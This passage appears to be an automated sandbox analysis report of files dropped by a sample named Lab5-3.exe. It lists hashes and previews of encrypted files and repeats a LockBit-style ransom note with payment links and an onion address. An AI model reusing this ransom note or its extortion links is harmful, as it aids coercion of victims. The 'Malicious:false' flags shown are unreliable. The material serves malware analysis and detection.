                                                                                                          Size (bytes):1616
                                                                                                          Entropy (8bit):7.88422638415301
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:k3GqSHfUTid3hBaUoSGFcmeykEdEElU92i:k3tNGx0uKeY2ElUJ
                                                                                                          MD5:FFF996BA7198663A3382FBB367C1DF67
                                                                                                          SHA1:C0570CF659521595307A69E71EDF406157D42C63
                                                                                                          SHA-256:C6AD1AAB1A544A03C650624DB59BAD297724A988B4615CA67F670A05C8085E32
                                                                                                          SHA-512:46E9DFBAC6C1037E231A1B1EB947F396D3CF7BC08EF3C3376AB98B94E6F47199876BE3BC7E79DFA1ADBDB59FB6EB8A7F5AF11F1BBFDB6E6142DB47EAACADAEF7
                                                                                                          Malicious:false
                                                                                                          Preview:.rG..N..G.t.L.M..3..#.....-....;.-..A..%.......w...\..../............').....a|..h..|.....b.(.I...u|m/...u.J...C<.{..S...L...F^....a..ty..?..R(........a7....&z...........]pFy>...m..1..@....,a..w...@.......&3r...,k{=n......+...W%O.X.Z...Z...B..[ZP.h..'.k..IX.5.7..D.[..T*.r......Ty......._..h}..@.}...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1616
                                                                                                          Entropy (8bit):7.883548052322538
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:O9uuMfHfUTid3hBaUoSGFcmeykEdEElU92i:O9ikGx0uKeY2ElUJ
                                                                                                          MD5:B86CF2DFB00CB8887B27CF2A9356F97B
                                                                                                          SHA1:2751669376181CCE06B3CC0FDD6396A46B02DEF3
                                                                                                          SHA-256:12CD83C118C6B50C0B1133E0C81E776A43D33F5883B26C51037621B2585BA738
                                                                                                          SHA-512:EAC106B089C7E57765A648E68A4FC74DE92C973E9D9DA934F5D30ECC1713A8BBEEC3929EFBB1EFFE5A96C23897D135262436716472512A4D724902644A21EC21
                                                                                                          Malicious:false
                                                                                                          Preview:....%..%..fa.ea.......l.L........`..R.......x`]Z..Y../...W.Pa....^.vA.`...E).K..../....%.S.8...WJ....._.....p./.............\;..n?...5.H..X.Y.zQ....XMe.E..<..I.l..,.....|...x...:..B..$.....J|(m.'.?.-Q.......n..r..0y...L&\>;.P$/.y.....\...'].....)....!p..!..U....}K._.BIq.h.....^.U...J...$W...jt..gPN....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1616
                                                                                                          Entropy (8bit):7.879680634678007
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zOvQBIkHfUTid3hBaUoSGFcmeykEdEElU92i:+PjGx0uKeY2ElUJ
                                                                                                          MD5:2E4EBACFCD6C1C21C0BE3DE101FB7349
                                                                                                          SHA1:7E520C971C7C61E6A00401F50DCE95DBA29E4390
                                                                                                          SHA-256:06C201192A3446AFFCA42EED7ADDCF644E1A597D2355DDC3710A29330BC033C1
                                                                                                          SHA-512:C7140B6944F1FBF8A21E611F05B2FAC5B3965D56E39A2FB6987446EA017036EC6BF85C82E2E29E4279FC92D14F0D99BBAB7E22E1C20A3CB072B4D6EA04B92AA2
                                                                                                          Malicious:false
                                                                                                          Preview:..q.E...$+[..f...x..?.[lOPp.CJ......f...no.Y..%..)B.R.2b.y. /....6.....y.%!|...X.t....@.......&9.?.*.E....@Y...en>...n.9.X4......J..y.&....c1?..P...9*.....q.M[W......l...v....?qI.D..>..x.....u/l7..p;..I..UoL.0...o3.jW.8.<.(..E.\..V..b...H*..E..v...>K./...\(.....J..l|.v......{5b.A.........x..UC9. ..3a.(..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8GiL1.e..dJ.`..4...(XF..l.Io...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2048
                                                                                                          Entropy (8bit):7.919278973536661
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1mj2VgqFjduNmJZ++RHfUTid3hBaUoSGFcmeykEdEElU92i:Ej2djdcwZKGx0uKeY2ElUJ
                                                                                                          MD5:B94B37910C12DE185DC4C77B6204DE49
                                                                                                          SHA1:5B787AB2AF4A24C50E791190E7E412C0FA9EB9DF
                                                                                                          SHA-256:3B0789393C4E8CF7E280112A1288A409A14E6AF16B24344EACDFD361A0AE22B5
                                                                                                          SHA-512:23FB879DC74C2BD53469AFF16F2390A6F2B56314F472C4E4DA1B894C3A2646DDDA453268745EE9E710E5C677982C01E17626AAE5EBA6410D382BED8C3F4CC1B2
                                                                                                          Malicious:false
                                                                                                          Preview:.;.7......$..S..'.t./yB.N.pr.q.?...=&.K.s.0..H..._.S.`j<m.._..$1.{b...Y......T!.....Y.lY...w..|u.....9#....v.g.u.v....E.m7.k..d..*.+Z......y.N..4..L...c.n.M..U7Vl_.f...eVcje%.Y'.....10..G`......u.&.......2.B.C.....fsW....."ZH.....>..Km.}.Py.e..R..f.{....Lz..4.8.%.:&..E.r...__Z.....!.l....1C(.[.OBq:@..B.`...D.[.gw....(.X...:.....n.i.T.I.K...,....}.....4.0...ib.1.z4..j..\.....%.q...F.\.......#.....>....`..)...QZ...o..vH.H.q...7w].6......Ne.Y.B..FOP...Q..<..........^tsC...~...8....0%.....8........].#.l...s..!9..i..g.....S...k.....7F..:..M3{.:..C....g......#.....k.P...^..D@..j.I..4~U>e../.c.../.02hm.P.B......V....$U..|j..0o.N..V.2.8A. g"........I.:....5.,Ur:....1...Lv..0.R.#.FC(.]b..<.........&..8JZ.a....k..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5920
                                                                                                          Entropy (8bit):7.966344164468369
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:g2jTiQV6q3PIMXYBnhNBESExzbZfO26n+60xmJcKtYAW34Gx0uKeY2ElUJ:gIDwqgMXM4SyfZ2z+BunQ0Cb
                                                                                                          MD5:F5FAC6366903F8A7251B9D8C53E9AF91
                                                                                                          SHA1:9479B54576A5F5123FB90C0833285AFD0BFBA621
                                                                                                          SHA-256:8A3125EE7A19EEE1BA736895798BF38E7E1E326F20436158C6C13B3181D237A0
                                                                                                          SHA-512:4242B89DA6DC1E87CB247F9C17F58A106C4131A56D7D0E041B3993DA2427427ACC3AA79F72204DF9C3D1E7A47DB667C712598EF35563E9C53901DF3F5D43307F
                                                                                                          Malicious:false
                                                                                                          Preview:.B2n.z.JW..|Q....Mov......P...co.6..6.(..q&.G...|.d............uk'.....U..h.^}8......`..\..:.zz.~.....sF.'j...jp....v......U...G.H..J.w .H....?..,..x=....^#h"%{...d........y..9.<.m......"iw?.x.........>..D..;....Z5.Q+B.p.......q.k.=dM.....U.g....1...ayd.[J...K.{z-2E.......8....-.}.....C.z....Z.........Om.A$..~g......m..~rZ.........G=./q.Q8..2..1&i.j.z.S..+c...k........GF..Oh....'.\$_........[.7.y:.g..d.@... l...,X..a...`.f.}^W}b...M.[YQ/wJ.)..O.........Vx;..~]....8.o.F.KK...)..D1...n2m..Z...b....u.I........Q../PL.....+...|...(....R.f..."_o....."....u:.FX..^.f..7..]....T..G.r$K7..I.%...... ..K..E...T.....4..6-..k:...6.....sf.H....Ad..U..X.^O..~..z...T...o."".:J..r..o.....~....S...E..[8......B.......m>.8.o...R.+..5.Y..a]Y........}.y..V..2.....1,gny....r.Q7..'.x.....D...1j...'.S..l..f/..../.......*..D...>.... .&T.+OU...W...~....e.......P8.8..*..O...FhP..B.xz...4..=.o*.J......X.o..../.r3..h:.....qWHw=Bq..@.."e......-.`.o.V6.}|...zN.D.xwZ.@0k..V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5360
                                                                                                          Entropy (8bit):7.966005017069782
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:SZXqafblauCnMh+LuB5qX+anLM2PCo+87GGx0uKeY2ElUJ:SZxaBw+LurqOgM9kx0Cb
                                                                                                          MD5:D15511F8E3B2AFBDF9B093BDA7F926E1
                                                                                                          SHA1:AFEA3B75B09D717E6FEB420BF0B756D0EF2B48DE
                                                                                                          SHA-256:3265A0781AD41042DC55CA98FAA74245C0D9A1EABA9E7B3E049B59EEF707BDC8
                                                                                                          SHA-512:A21BE08A5357D7CF194AE49EECCEA81E9577F530A53309A986AD115ECB028E5606C5C6AFEDA5883D8854DB7D75F88157674B9694185D2698B8ECE26A3E26C245
                                                                                                          Malicious:false
                                                                                                          Preview:5...;~.......\..h...RI...?4Ma.R.y/b)....W...Rk..F....U.......".~.|........;.L.x.f2..&....B....*..E.3...[..bu.A...Y[...3...L....9.T.Ja....M9p........!...P.o....Z...../'W.zK...N...t..&.z.A._q@.....b.Y....~..Y.a.o.i..`~D....4...8.,...$....."b..wd.)L.,.gT..........._dnhK.1.!...g......;*]E...Q..xf.0....... R..x80...)ij.Q(O[1.:4u.2j-}..v.5%:5.e$....C.X._....#.0..g....q.....F....T.dSe.Q.-@/...S.6....o.[fp.O.w...l..TK.Mw...m........I....w6B=...]V%(..y.(:v:B<..m..ka...QB.N.=..1.i*dm=..Y.c.\..#]..4..6n(.t.;O..x..2.2.....U7W..3bdL.:....Hc."V...~..TZ.:.8..}.l.+..e.&.@..V......Nc........p,Y..o~.HrRyU_w..{~.a<.2"G(.n.w'.o*).N..*n.w..K.(.`..>)<..iN...l........i.u).....B9...X..\.:../6L.....@....=..{..I.....EP..BQ.TU&.&..y...2....P.....A3.H<.......g./vb.=.P.|..8..t..m@...bD..._.I.....4[|e....`..K.qe......m.@.7..B.3...,b....R ...o.99aJy.e.[.o...@.,b.n$.....e..+%~...;....A....=U.BS..2.. .|R..O...b$.N...5N..%...`....i...A|;$C....V.GW$...\.....P..Z....A.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5360
                                                                                                          Entropy (8bit):7.964433615682363
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:J0fj4nZy645vmCS5GHa/IBLqTro2nxIyd2prYFmYhHGx0uKeY2ElUJ:ifj4Zh45vD7y2fAIyd6YQYu0Cb
                                                                                                          MD5:5B0200D6084EB5D6F14557A1F2734F16
                                                                                                          SHA1:DA7C0D51664F640D8C6C8758D1BB2FF80087FDBB
                                                                                                          SHA-256:6C22BAFAA5188E51D570BFB472F2375D6E341BAA3588C00D9FBD90551AEDDEF8
                                                                                                          SHA-512:5D4A6014CCF7D2AD37C47E8D58247DA09817029BF0403060ED71544B67621B53B2AA37DEA31CBF314AF343576447BC5462E260895AE2D342EC3E16938474ADE2
                                                                                                          Malicious:false
                                                                                                          Preview:;x..&}.,i.O.v............x...D.....s..jQ...|..$B.&i..DC..c..i.k...F..S..^.A1X..6..O!.r^k..`5*^}..P..$i..8^..[dS...-.C....p..k.......:..#..e4N.".s4a&-w...WI.|.....d.)l..!Y...!.d.V..r.k-..#y15?{.<.Y...F@.[)E...bk....V.....Y...>.(.6?...S.........\.~*w...s.3>Y.D.g.f.D..n.C..b.Pdu..(!....,.+....V~R..w....b_..t5....s....h..K....mBxq....kr..._.i>..+..)."......bW...G....l.7.....p......vB'..c..+a.....I~....e1!D...m..[ry.3r.;.@>..H=..[..@.<...Y.^.|.9.m^..E...#=]....s..o..o...b.s.c.}k;.........#U...Br.\..U..z...t63..@yW..>#.V.KW..:iC*e...W#N.@.I".f_t:. .K.5rIz.hNm....<.....o61..Y..B.B..4.bF]}.V.C..zv...<.t..........t&ec....jCX\I..=P..pUk....f...i*...f..$k.@&].V.iT..H...........-,.6!b9r....X..~..h..C..4..9iC%.[.a&~~..X.b........._C.<.J..7/G.........e.....^.h..hH1.<.J.b.?.K`.,A|?8?.....~.%5l.9.."9...#.,B..SmJx.B.m......s..]4...*i.iL..&..`.......y.5....-..g4i.x{f.?.....l...q../K..J........'F..T...P.|YIX..........ld.......5.0m.n.z...c...u.C..E.f).'+%}~..M....."F
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5200
                                                                                                          Entropy (8bit):7.963762075956398
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:WeP/EXjz9BrUA+4XS7SD3ULKeptQy7ZQMZoNGicnvXHheJGx0uKeY2ElUJ:WWMHrROSAVf7JpvXH0Cb
                                                                                                          MD5:1FB7213091B5AC710035BEC9D4F00AF6
                                                                                                          SHA1:C93DF40340C871453935A54B610F2E8963A5F2E7
                                                                                                          SHA-256:0345D70FC1B749E7F3D17C54905EA4BDC0ADC62912FE64E49C6B2074F53C7DC4
                                                                                                          SHA-512:AE14F7CC25218807F1934822C49C0579015916C2AB7496E88169FAEBB38303E03EBA67534FCA63D9F61F5FB973A730158DD0F807797924204791AB08421E8464
                                                                                                          Malicious:false
                                                                                                          Preview:..k.{.]!..K%.........>A..-.i..%.g[V,...h.p...Us6..<...IWG.F.....s<..o~......+Yp..FWn831.sx..yn.aKi....v0F.......^._.......x...o.-.....Y..W.6.-.c.M..[.....8..F.DV|..n|t.9...........Rj.w+t.."..&..B\uu...bP_.P......z..r....NDN..qBh...B@v....4i'..I.....;E.o..@....g....3.q-.n..jh.u.%.._......9.Y.H.M.....#Hf.4..1N......hC...aa......4.....W....A..>..qNl0d4..x..^]X.#.d.HP.Q.eLXxF%9Y.,.h=`..?.ls L.n.v|B:.R.NI..B.#84k.0.8`....r)Xi.6.v..g)>....EM..T.*b.BvI............."w1....A\.;..../ODIfn(.........W&...k.$..nsLS.f...:.)......!..}.n(V.`.....*t...k......U...&.1.....y.c.z.>.>"x}.w6.w..rw..,.....Z3R.j.....Y.2.&0......(....Y...}&...e.(u.!.m.....\1.........."..g....#@........U`r....'.R.A...M....,.))...xu.ah5.$ ;..W'P-,..<.\:.up&B..KJ!GNO.h%.h...PP..t.....(u.........~T.........l.eWa.+>.;./.4}.h.S.....w|.o3"W.............U.R...1.V.5..G.i.?./).....)..oo.....6....u......$Y....1f.....s4..."#...K"......`..GV.v.}4.m.b.....!......+.nT......)3!|uw.#{d..O$
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5344
                                                                                                          Entropy (8bit):7.968678954350753
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:CWNFmP6fO+O9pCIpHYfl3/24BWupdk0PjsWsjqXeu4Gx0uKeY2ElUJ:CWFfO9pDJ0PAPm70Cb
                                                                                                          MD5:B6F38819F7B0250F7CA096BE1416DFD3
                                                                                                          SHA1:F87779AE2447CBAFFB984294184B96A3DD6C531F
                                                                                                          SHA-256:C18A02313B728F59F93E8ECA757F05980FF1DE2066A3C00DF70734FB32B044A3
                                                                                                          SHA-512:CDCAD9771909464F2F2A08AD3AB2415D572BBBD5064BC5F51624182FA4C36280E9494A54A910332E9ECF91A1A9A29E160C20B9A8768D56518727D819F9F7BE05
                                                                                                          Malicious:false
